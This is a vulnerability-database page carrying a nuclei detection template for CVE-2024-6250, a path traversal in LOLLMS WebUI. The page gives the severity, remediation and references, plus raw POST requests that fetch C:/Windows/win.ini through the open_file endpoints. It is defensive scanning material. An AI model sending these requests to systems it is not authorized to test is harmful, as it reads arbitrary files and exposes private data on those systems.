Lucene search
K

LOLLMS WebUI - Absolute Path Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Absolute path traversal in LOLLMS WebUI exposes Windows files and directories via open_file.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6250
28 Jan 202617:51
circl
CNNVD
LoLLMs Security Vulnerabilities
27 Jun 202400:00
cnnvd
CVE
CVE-2024-6250
27 Jun 202418:41
cve
Cvelist
CVE-2024-6250 Absolute Path Traversal in parisneo/lollms-webui
27 Jun 202418:41
cvelist
EUVD
EUVD-2024-47374
3 Oct 202520:07
euvd
NVD
CVE-2024-6250
27 Jun 202419:15
nvd
Positive Technologies
PT-2024-37482
27 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-6250
5 Feb 202503:05
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-6250
20 Feb 202600:00
vulncheck_kev
Vulnrichment
CVE-2024-6250 Absolute Path Traversal in parisneo/lollms-webui
27 Jun 202418:41
vulnrichment
Rows per page
id: CVE-2024-6250

info:
  name: LOLLMS WebUI - Absolute Path Traversal
  author: ritikchaddha
  severity: high
  description: |
    An absolute path traversal vulnerability exists in parisneo/lollms-webui v9.6, specifically in the open_file endpoint of lollms_advanced.py. The sanitize_path function with allow_absolute_path=True allows an attacker to access arbitrary files and directories on a Windows system. This vulnerability can be exploited to read any file and list arbitrary directories on the affected system.
  impact: |
    Attackers can read arbitrary files and list directories, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest version where the vulnerability is fixed or modify the `sanitize_path` function to disallow absolute paths.
  reference:
    - https://huntr.com/bounties/11a8bf9d-16f3-49b3-b5fc-ad36d8993c73
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6250
    - https://github.com/parisneo/lollms-webui
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6250
    epss-score: 0.01957
    epss-percentile: 0.77862
    cwe-id: CWE-36
  metadata:
    verified: false
    max-request: 2
    vendor: lollms
    product: lollms_web_ui
  tags: cve,cve2024,lollms,lfi,traversal,ai,vkev

http:
  - raw:
      - |
        POST /open_file HTTP/1.1
        Host: {{Hostname}}

        {"path": "C:/Windows/win.ini"}

      - |
        POST /api/open_file HTTP/1.1
        Host: {{Hostname}}

        {"path": "C:/Windows/win.ini"}

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "bit app support", "[fonts]", "[extensions]")'
          - 'contains(content_type, "text/plain")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402204eb68b7f0a7bee49dfa8e8cfeae3269914a0c944dfc926614a8e68e2fc261b3d0220056f4d1bfec19aebbdb916dac157bbae1bfeee9f61f69d4b924d9c3ed9b7878b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 37.5
EPSS0.01957
SSVC
15